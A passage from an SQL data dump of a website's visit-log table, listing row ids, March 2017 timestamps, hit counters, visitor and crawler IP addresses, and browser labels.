,0,1,0,'66.249.64.179',''),(95017,1490165972,2,2,0,0,'91.196.178.69','firefox'),(95018,1490166374,1,0,1,0,'66.249.64.179',''),(95019,1490166612,1,1,0,0,'141.8.142.58','other'),(95020,1490166645,1,1,0,0,'95.108.179.10','other'),(95021,1490166648,1,1,0,0,'37.9.113.35','other'),(95022,1490167327,1,0,1,0,'66.249.64.183',''),(95023,1490167345,1,1,0,0,'52.86.176.3','other'),(95024,1490168644,1,1,0,0,'95.135.88.116','chrome'),(95025,1490168710,1,0,1,0,'66.249.64.59',''),(95026,1490168729,1,1,0,0,'178.95.232.252','chrome'),(95027,1490168787,1,1,0,0,'195.49.151.99','chrome'),(95028,1490169095,1,1,0,0,'91.196.178.69','firefox'),(95029,1490169111,1,1,0,0,'8.29.198.25','other'),(95030,1490169230,1,1,0,0,'91.196.178.69','chrome'),(95031,1490169896,1,0,1,0,'66.249.64.61',''),(95032,1490170144,1,1,0,0,'91.196.178.69','chrome'),(95033,1490171002,1,1,0,0,'54.244.48.31','msie'),(95034,1490171098,1,0,1,0,'66.249.64.57',''),(95035,1490171704,1,1,0,0,'91.196.178.132','firefox'),(95036,1490172303,3,3,0,0,'46.119.184.32','other'),(95037,1490172475,1,1,0,0,'37.53.75.149','chrome'),(95038,1490172552,1,1,0,0,'180.76.15.27','other'),(95039,1490173727,1,0,1,0,'66.249.64.179',''),(95040,1490173893,1,1,0,0,'95.134.96.72','firefox'),(95041,1490174263,2,2,0,0,'46.201.242.237','firefox'),(95042,1490174332,1,1,0,0,'91.196.178.69','firefox'),(95043,1490174481,1,1,0,0,'90.154.76.97','msie'),(95044,1490174606,1,1,0,0,'80.254.155.43','chrome'),(95045,1490174958,1,1,0,0,'95.132.36.177','firefox'),(95046,1490174968,1,1,0,0,'130.193.50.34','other'),(95047,1490175727,1,1,0,0,'130.180.217.229','firefox'),(95048,1490175862,1,1,0,0,'46.201.242.237','firefox'),(95049,1490176162,1,1,0,0,'91.196.178.163','chrome'),(95050,1490176462,1,0,1,0,'66.249.64.187',''),(95051,1490176475,1,1,0,0,'91.229.121.3','chrome'),(95052,1490176946,1,1,0,0,'46.48.13.161','chrome'),(95053,1490176956,2,2,0,0,'91.209.11.236','other'),(95054,1490176983,1,1,0,0,'95.28.39.60','msie'),(95055,1490177320,1,1,0,0,'95.134.96.72','firefox'),(95056,1490177355,1,1,0,0,'91.196.177.46','chrome'),(95057,1490177416,1,1,0,0,'176.15.237.212','msie'),(95058,1490177811,213,213,0,0,'46.4.97.116','other'),(95059,1490177955,1,1,0,0,'91.196.178.69','chrome'),(95060,1490178498,1,1,0,0,'91.209.11.236','other'),(95061,1490178602,1,1,0,0,'91.196.178.163','chrome'),(95062,1490178680,1,1,0,0,'195.69.222.18','firefox'),(95063,1490179109,1,1,0,0,'95.134.96.72','firefox'),(95064,1490179388,1,0,1,0,'66.249.64.187',''),(95065,1490179814,1,1,0,0,'37.53.226.14','chrome'),(95066,1490179934,1,1,0,0,'8.29.198.26','other'),(95067,1490180050,1,1,0,0,'91.196.178.70','firefox'),(95068,1490180122,1,1,0,0,'94.179.30.43','chrome'),(95069,1490180371,1,1,0,0,'195.49.151.99','chrome'),(95070,1490180398,2,2,0,0,'130.193.51.43','other'),(95071,1490180476,1,1,0,0,'93.158.152.9','other'),(95072,1490180483,1,1,0,0,'5.255.253.53','other'),(95073,1490180488,1,1,0,0,'130.193.50.34','other'),(95074,1490180490,1,1,0,0,'141.8.183.25','other'),(95075,1490180498,1,1,0,0,'130.193.51.19','other'),(95076,1490180504,1,1,0,0,'95.108.179.18','other'),(95077,1490180505,1,1,0,0,'93.158.152.84','other'),(95078,1490180530,1,1,0,0,'141.8.142.206','other'),(95079,1490180537,1,1,0,0,'93.158.152.46','other'),(95080,1490180539,1,1,0,0,'91.196.177.26','chrome'),(95081,1490180688,2,2,0,0,'46.48.13.161','chrome'),(95082,1490180843,1,1,0,0,'91.196.178.69','firefox'),(95083,1490180980,1,1,0,0,'91.196.178.37','chrome'),(95084,1490181171,1,1,0,0,'91.196.178.66','firefox'),(95085,1490181653,1,1,0,0,'5.255.253.10','other'),(95086,1490181703,1,1,0,0,'130.193.50.34','other'),(95087,1490181706,1,1,0,0,'141.8.142.85','other'),(95088,1490181710,1,1,0,0,'141.8.132.30','other'),(95089,1490182066,1,1,0,0,'94.179.30.43','chrome'),(95090,1490182444,1,1,0,0,'93.158.152.61','other'),(95091,1490183405,1,1,0,0,'91.196.178.69','firefox'),(95092,1490184088,1,1,0,0,'91.209.11.236','other'),(95093,1490184671,1,1,0,0,'213.179.252.157','firefox'),(95094,1490184760,1,1,0,0,'95.108.179.22','other'),(95095,1490184763,1,1,0,0,'93.158.152.51','other'),(95096,1490184932,1,0,1,0,'66.249.64.61',''),(95097,1490185024,1,1,0,0,'91.196.178.69','firefox'),(95098,1490185191,1,1,0,0,'66.249.64.59','chrome'),(95099,1490185393,1,1,0,0,'91.196.177.26','chrome'),(95100,1490185559,1,1,0,0,'91.196.178.65','chrome'),(95101,1490185673,2,0,2,0,'66.249.64.183',''),(95102,1490185796,1,0,1,0,'66.249.64.187',''),(95103,1490186234,5,5,0,0,'91.196.178.69','firefox'),(95104,1490186665,4,4,0,0,'108.59.8.70','other'),(95105,1490187265,1,0,1,0,'66.249.64.179',''),(95106,1490187512,1,1,0,0,'91.196.178.69','firefox'),(95107,1490187733,1,1,0,0,'130.193.50.6','other'),(95108,1490187736,1,1,0,0,'5.255.253.67','other'),(95109,1490187743,1,1,0,0,'93.158.152.40','other'),(95110,1490188032,1,1,0,0,'91.209.11.236','other'),(95111,1490188437,1,1,0,0,'5.83.23.3','chrome'),(95112,1490189510,1,1,0,0,'91.196.177.26','chrome'),(95113,1490189536,2,2,0,0,'46.201.242.237','firefox'),(95114,1490189652,1,1,0,0,'91.196.178.69','firefox'),(95115,1490189902,1,1,0,0,'91.196.178.163','chrome'),(95116,1490190061,103,103,0,0,'209.190.113.85','other'),(95117,1490190069,1,0,1,0,'66.249.64.61',''),(95118,1490190131,1,1,0,0,'64.79.76.50','other'),(95119,1490190393,1,1,0,0,'37.52.155.75','firefox'),(95120,1490190428,2,1,1,0,'66.249.64.61',''),(95121,1490190564,1,1,0,0,'82.207.49.50','chrome'),(95122,1490190640,1,1,0,0,'91.196.178.167','chrome'),(95123,1490190767,1,1,0,0,'8.29.198.25','other'),(95124,1490190981,1,0,1,0,'157.55.39.238',''),(95125,1490191088,1,1,0,0,'95.108.179.22','other'),(95126,1490191336,1,1,0,0,'91.196.177.26','chrome'),(95127,1490191591,1,0,1,0,'66.249.64.183',''),(95128,1490191746,2,2,0,0,'46.201.242.237','firefox'),(95129,1490191822,1,0,1,0,'66.249.64.187',''),(95130,1490191924,1,1,0,0,'91.196.178.68','firefox'),(95131,1490192034,1,1,0,0,'195.10.210.49','chrome'),(95132,1490192129,1,1,0,0,'130.180.211.231','other'),(95133,1490192288,1,1,0,0,'91.196.178.65','chrome'),(95134,1490192386,1,1,0,0,'91.196.178.68','chrome'),(95135,1490192581,1,0,1,0,'157.55.39.238',''),(95136,1490192857,1,1,0,0,'130.180.209.221','other'),(95137,1490192894,1,1,0,0,'66.249.64.183','chrome'),(95138,1490193051,1,1,0,0,'91.209.11.236','other'),(95139,1490193194,1,1,0,0,'46.48.13.161','chrome'),(95140,1490193702,1,1,0,0,'195.49.151.99','chrome'),(95141,1490193912,1,1,0,0,'95.135.90.80','chrome'),(95142,1490193984,1,1,0,0,'195.64.190.1','chrome'),(95143,1490194635,1,1,0,0,'46.48.13.161','chrome'),(95144,1490194971,1,1,0,0,'37.55.227.246','chrome'),(95145,1490195206,1,1,0,0,'91.209.11.236','other'),(95146,1490195433,1,1,0,0,'91.196.178.68','firefox'),(95147,1490195545,1,1,0,0,'37.52.22.102','chrome'),(95148,1490195578,1,1,0,0,'188.239.85.135','chrome'),(95149,1490195642,1,1,0,0,'46.48.13.161','chrome'),(95150,1490195721,1,1,0,0,'193.254.196.141','chrome'),(95151,1490195997,1,1,0,0,'141.8.142.152','other'),(95152,1490196008,1,1,0,0,'5.255.253.54','other'),(95153,1490196687,1,1,0,0,'91.196.178.65','chrome'),(95154,1490197104,1,1,0,0,'46.48.13.161','chrome'),(95155,1490197346,1,1,0,0,'40.77.167.112','other'),(95156,1490198575,1,0,1,0,'66.249.64.183',''),(95157,1490198980,1,0,1,0,'66.249.64.61',''),(95158,1490199301,1,1,0,0,'95.132.6.67','firefox'),(95159,1490199375,1,1,0,0,'141.8.142.142','other'),(95160,1490199887,1,1,0,0,'66.249.93.202','chrome'),(95161,1490199891,1,0,1,0,'66.249.64.61',''),(95162,1490199901,1,1,0,0,'66.249.93.204','chrome'),(95163,1490199924,1,1,0,0,'37.55.227.246','chrome'),(95164,1490201145,1,1,0,0,'37.55.227.246','chrome'),(95165,1490201319,1,1,0,0,'66.249.64.57','chrome'),(95166,1490201593,1,1,0,0,'8.29.198.27','other'),(95167,1490201662,1,1,0,0,'207.46.13.195','other'),(95168,1490201903,1,1,0,0,'91.196.178.72','chrome'),(95169,1490202587,1,1,0,0,'130.180.216.235','firefox'),(95170,1490202736,67,67,0,0,'89.163.243.39','other'),(95171,1490202956,1,1,0,0,'91.209.11.236','other'),(95172,1490205326,1,1,0,0,'91.196.178.165','chrome'),(95173,1490205405,1,1,0,0,'178.137.83.166','chrome'),(95174,1490205767,1,1,0,0,'66.249.64.57','chrome'),(95175,1490205780,1,0,1,0,'207.46.13.193',''),(95176,1490205850,1,0,1,0,'66.249.64.183',''),(95177,1490205852,1,1,0,0,'66.249.64.179','chrome'),(95178,1490206442,1,0,1,0,'66.249.64.187',''),(95179,1490208405,1,1,0,0,'66.102.9.28','chrome'),(95180,1490209036,2,1,1,0,'157.55.39.7',''),(95181,1490209144,1,1,0,0,'130.180.212.103','other'),(95182,1490209496,1,0,1,0,'207.46.13.195',''),(95183,1490209497,1,1,0,0,'91.209.11.236','other'),(95184,1490209703,1,1,0,0,'66.249.64.24','chrome'),(95185,1490210107,1,1,0,0,'91.196.178.162','chrome'),(95186,1490210109,1,1,0,0,'46.219.249.100','chrome'),(95187,1490210143,1,0,1,0,'66.249.64.27',''),(95188,1490210472,1,0,1,0,'66.249.64.143',''),(95189,1490210520,1,0,1,0,'66.249.64.123',''),(95190,1490211040,1,1,0,0,'109.86.54.116','chrome'),(95191,1490212426,1,1,0,0,'8.29.198.25','other'),(95192,1490212521,1,1,0,0,'46.211.159.205','chrome'),(95193,1490212838,1,1,0,0,'91.196.178.165','chrome'),(95194,1490213235,1,1,0,0,'159.224.159.8','chrome'),(95195,1490213256,1,1,0,0,'95.108.179.15','other'),(95196,1490213367,1,1,0,0,'141.0.12.180','other'),(95197,1490213733,1,0,1,0,'66.249.64.69',''),(95198,1490214041,1,1,0,0,'66.249.64.79','chrome'),(95199,1490214085,1,1,0,0,'66.249.64.27','chrome'),(95200,1490214119,1,1,0,0,'46.211.157.50','other'),(95201,1490214782,1,1,0,0,'66.249.64.21','chrome'),(95202,1490215111,11,11,0,0,'82.82.225.5','other'),(95203,1490215836,1,1,0,0,'91.196.178.72','firefox'),(95204,1490216074,1,1,0,0,'107.21.1.8','other'),(95205,1490216218,1,1,0,0,'66.249.64.24','chrome'),(95206,1490216635,1,1,0,0,'157.55.39.7','other'),(95207,1490219829,1,1,0,0,'52.86.176.3','other'),(95208,1490220615,1,0,1,0,'66.249.64.79',''),(95209,1490220864,2,2,0,0,'66.249.64.74','chrome'),(95210,1490220992,1,1,0,0,'109.63.250.161','msie'),(95211,1490221345,1,1,0,0,'178.137.159.44','firefox'),(95212,1490221654,1,1,0,0,'66.249.64.21','chrome'),(95213,1490221824,2,2,0,0,'95.108.213.34','other'),(95214,1490223213,1,0,1,0,'207.46.13.199',''),(95215,1490223260,1,1,0,0,'8.29.198.27','other'),(95216,1490225219,1,1,0,0,'91.209.11.236','other'),(95217,1490226065,1,0,1,0,'66.249.64.27',''),(95218,1490226213,1,0,1,0,'66.249.64.133',''),(95219,1490226611,1,1,0,0,'66.249.64.143','chrome'),(95220,1490226613,1,1,0,0,'66.249.64.183','chrome'),(95221,1490227485,1,0,1,0,'66.249.64.24',''),(95222,1490228885,1,1,0,0,'207.46.13.173','other'),(95223,1490228904,1,1,0,0,'46.48.13.161','chrome'),(95224,1490229640,1,1,0,0,'95.108.213.34','other'),(95225,1490232089,1,1,0,0,'66.249.64.143','chrome'),(95226,1490233006,2,2,0,0,'95.108.213.34','other'),(95227,1490234089,1,1,0,0,'8.29.198.27','other'),(95228,1490234532,1,0,1,0,'66.249.64.57',''),(95229,1490234972,1,1,0,0,'91.209.11.236','other'),(95230,1490235857,2,2,0,0,'95.108.213.34','other'),(95231,1490237062,1,1,0,0,'66.249.64.138','chrome'),(95232,1490237422,1,1,0,0,'66.249.64.27','chrome'),(95233,1490238426,1,1,0,0,'66.249.64.24','chrome'),(95234,1490238429,1,1,0,0,'66.249.64.138','chrome'),(95235,1490239529,1,1,0,0,'91.213.59.174','chrome'),(95236,1490239558,1,1,0,0,'178.154.149.3','other'),(95237,1490239784,1,1,0,0,'141.8.142.164','other'),(95238,1490242155,1,0,1,0,'66.249.64.133',''),(95239,1490242668,1,1,0,0,'207.46.13.211','other'),(95240,1490242706,1,1,0,0,'207.46.13.199','other'),(95241,1490243872,1,1,0,0,'141.0.12.89','other'),(95242,1490244631,1,1,0,0,'91.196.178.72','firefox'),(95243,1490244916,1,1,0,0,'8.29.198.26','other'),(95244,1490245219,1,1,0,0,'5.255.253.58','other'),(95245,1490246359,8,8,0,0,'62.210.101.101','other'),(95246,1490246995,1,0,1,0,'66.249.64.133',''),(95247,1490247497,1,1,0,0,'91.196.178.71','firefox'),(95248,1490247662,1,0,1,0,'66.249.64.27',''),(95249,1490248417,1,1,0,0,'91.196.178.71','firefox'),(95250,1490249664,1,1,0,0,'46.118.203.214','chrome'),(95251,1490251068,1,1,0,0,'66.102.9.23','chrome'),(95252,1490251267,1,1,0,0,'163.172.64.177','other'),(95253,1490251294,1,1,0,0,'178.154.189.14','other'),(95254,1490252226,1,1,0,0,'91.196.122.186','chrome'),(95255,1490252250,1,1,0,0,'51.255.65.92','other'),(95256,1490252313,1,1,0,0,'190.166.252.206','chrome'),(95257,1490252619,1,1,0,0,'91.196.178.39','chrome'),(95258,1490252684,1,1,0,0,'179.108.48.34','chrome'),(95259,1490252749,1,1,0,0,'178.154.189.3','other'),(95260,1490252795,1,1,0,0,'66.249.93.157','chrome'),(95261,1490252898,1,0,1,0,'66.249.64.133',''),(95262,1490252929,1,1,0,0,'91.196.178.37','firefox'),(95263,1490253435,1,1,0,0,'164.132.161.66','other'),(95264,1490253887,1,1,0,0,'51.255.65.16','other'),(95265,1490253908,1,1,0,0,'91.196.178.37','firefox'),(95266,1490253930,1,1,0,0,'193.194.127.217','firefox'),(95267,1490254510,1,0,1,0,'66.249.64.133',''),(95268,1490254829,1,1,0,0,'164.132.161.26','other'),(95269,1490254964,1,1,0,0,'178.95.67.170','firefox'),(95270,1490255000,1,0,1,0,'66.249.64.24',''),(95271,1490255228,1,1,0,0,'217.69.133.169','firefox'),(95272,1490255304,1,1,0,0,'82.207.49.102','chrome'),(95273,1490255341,2,2,0,0,'46.211.4.23','other'),(95274,1490255430,1,1,0,0,'141.8.142.15','other'),(95275,1490255435,1,1,0,0,'95.108.179.15','other'),(95276,1490255439,2,2,0,0,'141.8.142.154','other'),(95277,1490255492,1,1,0,0,'217.12.211.216','chrome'),(95278,1490255633,1,1,0,0,'95.132.126.116','firefox'),(95279,1490255677,2,2,0,0,'91.196.178.65','chrome'),(95280,1490255744,1,1,0,0,'8.29.198.27','other'),(95281,1490256050,1,1,0,0,'51.255.65.34','other'),(95282,1490256142,1,1,0,0,'91.196.178.68','chrome'),(95283,1490256379,1,1,0,0,'46.211.4.23','other'),(95284,1490256403,1,0,1,0,'66.249.64.21',''),(95285,1490256554,1,1,0,0,'130.180.216.198','firefox'),(95286,1490256628,1,1,0,0,'163.172.64.187','other'),(95287,1490256647,43,43,0,0,'208.43.225.85','other'),(95288,1490256918,1,1,0,0,'66.249.64.133','chrome'),(95289,1490257104,1,1,0,0,'95.108.213.34','other'),(95290,1490257200,1,1,0,0,'157.55.39.247','other'),(95291,1490257446,1,1,0,0,'164.132.161.22','other'),(95292,1490257500,1,1,0,0,'207.46.13.211','other'),(95293,1490257716,1,1,0,0,'163.172.71.13','other'),(95294,1490258234,1,1,0,0,'37.55.150.182','opera'),(95295,1490258248,1,1,0,0,'46.219.2.9','chrome'),(95296,1490258660,1,0,1,0,'66.249.64.143',''),(95297,1490258669,1,1,0,0,'95.132.168.192','chrome'),(95298,1490259163,1,1,0,0,'207.46.13.199','other'),(95299,1490259836,1,0,1,0,'207.46.13.173',''),(95300,1490259994,1,1,0,0,'51.255.65.54','other'),(95301,1490260665,1,1,0,0,'91.196.177.46','firefox'),(95302,1490260865,1,1,0,0,'46.219.2.9','chrome'),(95303,1490261396,1,1,0,0,'51.255.65.72','other'),(95304,1490261729,1,1,0,0,'95.108.213.34','other'),(95305,1490262624,1,0,1,0,'66.249.64.21',''),(95306,1490262728,1,0,1,0,'66.249.64.143',''),(95307,1490263285,1,1,0,0,'180.76.15.148','other'),(95308,1490263326,1,1,0,0,'91.196.178.66','firefox'),(95309,1490264243,1,1,0,0,'141.8.142.97','other'),(95310,1490264246,1,1,0,0,'141.8.132.72','other'),(95311,1490264413,1,1,0,0,'180.76.15.25','other'),(95312,1490265235,1,1,0,0,'91.196.178.69','firefox'),(95313,1490265412,1,1,0,0,'77.222.134.100','firefox'),(95314,1490265591,2,2,0,0,'141.8.142.15','other'),(95315,1490265654,1,1,0,0,'95.108.213.34','other'),(95316,1490265743,1,1,0,0,'51.255.65.2','other'),(95317,1490265803,1,1,0,0,'164.132.161.16','other'),(95318,1490266577,1,1,0,0,'8.29.198.25','other'),(95319,1490266736,1,1,0,0,'91.196.178.66','firefox'),(95320,1490266967,1,1,0,0,'51.255.65.55','other'),(95321,1490269044,1,1,0,0,'94.45.135.106','chrome'),(95322,1490269417,1,1,0,0,'91.196.178.134','firefox'),(95323,1490269490,1,1,0,0,'94.178.190.104','firefox'),(95324,1490269743,1,1,0,0,'164.132.161.40','other'),(95325,1490270018,1,1,0,0,'130.180.208.85','chrome'),(95326,1490270545,1,0,1,0,'66.249.64.21',''),(95327,1490271005,1,1,0,0,'95.108.213.34','other'),(95328,1490271047,1,1,0,0,'164.132.161.85','other'),(95329,1490271346,1,0,1,0,'66.249.64.24',''),(95330,1490271652,1,1,0,0,'82.207.91.234','firefox'),(95331,1490272107,1,1,0,0,'91.196.178.72','firefox'),(95332,1490272384,1,1,0,0,'51.255.65.70','other'),(95333,1490272876,1,1,0,0,'94.179.77.48','chrome'),(95334,1490273259,1,0,1,0,'66.249.64.133',''),(95335,1490273309,1,1,0,0,'164.132.161.47','other'),(95336,1490273329,2,2,0,0,'164.132.161.79','other'),(95337,1490273414,1,1,0,0,'95.108.179.15','other'),(95338,1490273417,1,1,0,0,'95.108.213.34','other'),(95339,1490273631,1,0,1,0,'66.249.64.138',''),(95340,1490273691,1,1,0,0,'82.207.91.234','firefox'),(95341,1490273928,1,0,1,0,'66.249.64.24',''),(95342,1490274035,1,1,0,0,'157.55.39.247','other'),(95343,1490274108,1,1,0,0,'164.132.161.6','other'),(95344,1490274739,6,6,0,0,'46.229.168.67','other'),(95345,1490274763,1,1,0,0,'46.219.10.213','chrome'),(95346,1490274767,3,3,0,0,'46.229.168.72','other'),(95347,1490274781,4,4,0,0,'46.229.168.68','other'),(95348,1490274797,1,1,0,0,'46.229.168.66','other'),(95349,1490274851,2,2,0,0,'46.229.168.71','other'),(95350,1490274868,5,5,0,0,'46.229.168.69','other'),(95351,1490274879,4,4,0,0,'46.229.168.74','other'),(95352,1490274894,3,3,0,0,'46.229.168.73','other'),(95353,1490275033,1,1,0,0,'46.229.168.65','other'),(95354,1490275580,1,0,1,0,'157.55.39.176',''),(95355,1490275664,1,1,0,0,'51.255.65.73','other'),(95356,1490275713,1,1,0,0,'51.255.65.27','other'),(95357,1490275730,1,1,0,0,'89.19.115.242','chrome'),(95358,1490276007,1,1,0,0,'207.46.13.211','other'),(95359,1490276044,1,1,0,0,'164.132.161.93','other'),(95360,1490276081,1,1,0,0,'164.132.161.86','other'),(95361,1490276100,1,0,1,0,'66.249.64.143',''),(95362,1490276790,1,1,0,0,'95.108.179.15','other'),(95363,1490276794,1,1,0,0,'95.108.213.34','other'),(95364,1490276849,1,1,0,0,'157.55.39.247','other'),(95365,1490276950,1,1,0,0,'91.196.178.69','firefox'),(95366,1490277153,1,1,0,0,'46.219.10.213','chrome'),(95367,1490277172,1,1,0,0,'164.132.161.15','other'),(95368,1490277407,1,1,0,0,'8.29.198.25','other'),(95369,1490277694,1,1,0,0,'188.231.135.178','chrome'),(95370,1490277835,1,1,0,0,'141.8.142.4','other'),(95371,1490277915,1,1,0,0,'91.196.178.69','firefox'),(95372,1490277995,1,1,0,0,'66.249.93.202','chrome'),(95373,1490278203,1,1,0,0,'80.91.188.66','firefox'),(95374,1490278490,2,2,0,0,'95.132.16.201','firefox'),(95375,1490278596,1,1,0,0,'51.255.65.91','other'),(95376,1490278867,1,0,1,0,'66.249.64.143',''),(95377,1490278911,1,1,0,0,'46.211.122.234','other'),(95378,1490279021,1,1,0,0,'51.255.65.48','other'),(95379,1490279486,1,0,1,0,'66.249.64.138',''),(95380,1490279820,1,1,0,0,'91.209.11.236','other'),(95381,1490280193,1,1,0,0,'91.196.178.66','firefox'),(95383,1490280403,1,1,0,0,'91.196.178.69','firefox'),(95384,1490281165,1,1,0,0,'164.132.161.83','other'),(95385,1490281324,1,0,1,0,'66.249.64.143',''),(95386,1490281390,1,1,0,0,'164.132.161.12','other'),(95387,1490281544,1,1,0,0,'91.196.177.46','chrome'),(95388,1490281615,1,1,0,0,'82.207.91.234','firefox'),(95389,1490282317,1,1,0,0,'91.196.178.69','firefox'),(95390,1490282889,1,1,0,0,'51.255.65.86','other'),(95391,1490283305,1,1,0,0,'66.249.64.61','chrome'),(95392,1490283537,1,1,0,0,'91.196.178.100','chrome'),(95393,1490283583,1,1,0,0,'141.8.142.15','other'),(95394,1490283639,1,1,0,0,'95.108.213.34','other'),(95395,1490284274,1,0,1,0,'66.249.64.27',''),(95396,1490284586,1,0,1,0,'66.249.64.133',''),(95397,1490284809,1,1,0,0,'193.160.224.150','other'),(95398,1490285008,1,1,0,0,'164.132.161.84','other'),(95399,1490285204,1,1,0,0,'163.172.64.222','other'),(95400,1490285393,1,0,1,0,'157.55.39.176',''),(95401,1490285687,1,1,0,0,'157.55.39.176','other'),(95402,1490286761,1,1,0,0,'91.196.178.163','firefox'),(95403,1490286918,1,1,0,0,'164.132.161.71','other'),(95404,1490287150,1,1,0,0,'51.255.65.43','other'),(95405,1490287279,1,1,0,0,'37.52.115.154','chrome'),(95406,1490287780,1,0,1,0,'66.249.64.27',''),(95407,1490287944,9,9,0,0,'87.98.217.57','other'),(95408,1490288266,1,1,0,0,'8.29.198.26','other'),(95409,1490288550,1,1,0,0,'164.132.161.87','other'),(95410,1490289069,1,1,0,0,'163.172.64.226','other'),(95411,1490289611,1,1,0,0,'164.132.161.52','other'),(95412,1490289939,1,1,0,0,'51.255.65.28','other'),(95413,1490289951,1,0,1,0,'66.249.64.21',''),(95414,1490290254,1,1,0,0,'51.255.65.37','other'),(95415,1490290571,1,1,0,0,'66.249.64.21','chrome'),(95416,1490290753,1,0,1,0,'66.249.64.183',''),(95417,1490291027,1,1,0,0,'51.255.65.53','other'),(95418,1490291419,1,0,1,0,'66.249.64.24',''),(95419,1490291919,1,1,0,0,'163.172.70.217','other'),(95420,1490293063,1,1,0,0,'163.172.64.179','other'),(95421,1490293267,1,1,0,0,'91.196.178.100','chrome'),(95422,1490293599,1,1,0,0,'163.172.64.220','other'),(95423,1490294271,1,1,0,0,'130.180.210.77','chrome'),(95424,1490294337,1,1,0,0,'163.172.71.90','other'),(95425,1490294394,1,1,0,0,'164.132.161.11','other'),(95426,1490294573,1,1,0,0,'178.94.57.234','firefox'),(95427,1490294793,1,1,0,0,'51.255.65.56','other'),(95428,1490295102,1,1,0,0,'164.132.161.66','other'),(95429,1490296615,1,1,0,0,'91.196.178.33','chrome'),(95430,1490296959,1,1,0,0,'66.249.64.24','chrome'),(95431,1490297093,1,1,0,0,'66.249.64.143','chrome'),(95432,1490297095,1,1,0,0,'66.249.64.21','chrome'),(95433,1490297455,1,1,0,0,'164.132.161.18','other'),(95434,1490297637,1,1,0,0,'51.255.65.61','other'),(95435,1490297829,1,1,0,0,'93.75.2.233','firefox'),(95436,1490297830,1,1,0,0,'180.76.15.136','other'),(95437,1490298230,1,1,0,0,'95.108.213.34','other'),(95438,1490298828,1,1,0,0,'157.55.39.248','other'),(95439,1490299108,1,1,0,0,'8.29.198.27','other'),(95440,1490299168,1,1,0,0,'91.196.178.164','chrome'),(95441,1490299804,1,0,1,0,'66.249.64.57',''),(95442,1490299845,1,1,0,0,'164.132.161.92','other'),(95443,1490300611,1,1,0,0,'141.8.142.15','other'),(95444,1490300617,1,1,0,0,'157.55.39.247','other'),(95445,1490300907,1,1,0,0,'66.249.64.143','chrome'),(95446,1490301920,1,1,0,0,'51.255.65.22','other'),(95447,1490302083,1,1,0,0,'66.249.64.143','chrome'),(95448,1490302814,1,1,0,0,'51.255.65.28','other'),(95449,1490302887,1,1,0,0,'51.255.65.45','other'),(95450,1490304157,1,1,0,0,'51.255.65.6','other'),(95451,1490304372,1,1,0,0,'46.219.242.180','chrome'),(95452,1490304378,1,1,0,0,'164.132.161.67','other'),(95453,1490305260,1,1,0,0,'95.28.203.140','msie'),(95454,1490305838,1,1,0,0,'51.255.65.83','other'),(95455,1490306948,1,1,0,0,'82.145.223.113','other'),(95456,1490307210,1,1,0,0,'51.255.65.92','other'),(95457,1490308697,1,0,1,0,'157.55.39.176',''),(95458,1490308739,1,1,0,0,'164.132.161.20','other'),(95459,1490309074,1,1,0,0,'51.255.65.60','other'),(95460,1490309407,1,1,0,0,'66.249.64.27','chrome'),(95461,1490309408,1,1,0,0,'66.249.64.138','chrome'),(95462,1490309487,1,1,0,0,'164.132.161.90','other'),(95463,1490309704,1,1,0,0,'51.255.65.11','other'),(95464,1490309936,1,1,0,0,'8.29.198.26','other'),(95465,1490310295,1,1,0,0,'157.55.39.247','other'),(95466,1490310590,1,1,0,0,'66.249.64.143','chrome'),(95467,1490310936,2,2,0,0,'157.55.39.176','other'),(95468,1490312944,2,2,0,0,'95.108.213.34','other'),(95469,1490313251,1,1,0,0,'51.255.65.77','other'),(95470,1490313406,1,1,0,0,'163.172.68.127','other'),(95471,1490313948,1,0,1,0,'157.55.39.176',''),(95472,1490315627,1,1,0,0,'51.255.65.35','other'),(95473,1490315759,1,1,0,0,'163.172.64.223','other'),(95474,1490315913,1,0,1,0,'66.249.64.24',''),(95475,1490317126,1,1,0,0,'51.255.65.21','other'),(95476,1490318226,1,1,0,0,'164.132.161.33','other'),(95477,1490318637,1,1,0,0,'164.132.161.44','other'),(95478,1490319393,1,1,0,0,'164.132.161.9','other'),(95479,1490319980,1,1,0,0,'141.8.142.15','other'),(95480,1490320016,1,1,0,0,'95.108.213.34','other'),(95481,1490320455,1,1,0,0,'157.55.39.176','other'),(95482,1490320543,1,1,0,0,'51.255.65.92','other'),(95483,1490320766,1,1,0,0,'8.29.198.25','other'),(95484,1490321150,1,1,0,0,'91.196.178.132','chrome'),(95485,1490321629,1,1,0,0,'66.249.64.57','chrome'),(95486,1490321634,1,1,0,0,'66.249.64.187','chrome'),(95487,1490322794,1,0,1,0,'66.249.64.133',''),(95488,1490322903,1,1,0,0,'141.8.142.15','other'),(95489,1490323279,1,1,0,0,'163.172.108.151','chrome'),(95490,1490323547,1,0,1,0,'157.55.39.247',''),(95491,1490323635,1,1,0,0,'157.55.39.247','other'),(95492,1490323910,1,0,1,0,'157.55.39.176',''),(95493,1490324682,1,1,0,0,'46.48.13.161','chrome'),(95494,1490325586,1,1,0,0,'163.172.64.251','other'),(95495,1490326273,1,1,0,0,'95.108.213.34','other'),(95496,1490326646,1,1,0,0,'141.8.142.15','other'),(95497,1490327069,1,1,0,0,'157.55.39.176','other'),(95498,1490327135,1,1,0,0,'188.32.223.247','msie'),(95499,1490327978,1,0,1,0,'157.55.39.176',''),(95500,1490328674,1,1,0,0,'51.255.65.80','other'),(95501,1490329183,1,1,0,0,'51.255.65.93','other'),(95502,1490329236,1,1,0,0,'51.255.65.79','other'),(95503,1490329685,1,1,0,0,'141.8.142.154','other'),(95504,1490329689,1,1,0,0,'141.8.142.15','other'),(95505,1490330857,1,1,0,0,'95.108.213.34','other'),(95506,1490331592,1,1,0,0,'8.29.198.27','other'),(95507,1490332679,1,0,1,0,'66.249.64.24',''),(95508,1490333020,1,1,0,0,'163.172.64.236','other'),(95509,1490333045,1,1,0,0,'178.154.200.45','other'),(95510,1490333697,1,1,0,0,'91.196.178.70','firefox'),(95511,1490334076,1,1,0,0,'141.8.142.4','other'),(95512,1490334471,1,1,0,0,'163.172.64.217','other'),(95513,1490334540,1,1,0,0,'66.249.93.156','chrome'),(95514,1490334743,1,1,0,0,'164.132.161.48','other'),(95515,1490335061,1,1,0,0,'5.255.253.78','other'),(95516,1490336129,3,3,0,0,'91.209.11.236','other'),(95517,1490337110,1,1,0,0,'180.76.15.137','other'),(95518,1490337797,1,1,0,0,'91.196.178.72','firefox'),(95519,1490338053,1,0,1,0,'66.249.64.21',''),(95520,1490338181,1,1,0,0,'5.255.253.63','other'),(95521,1490338197,1,1,0,0,'141.8.183.1','other'),(95522,1490338203,1,1,0,0,'95.108.213.32','other'),(95523,1490338230,1,1,0,0,'141.8.132.39','o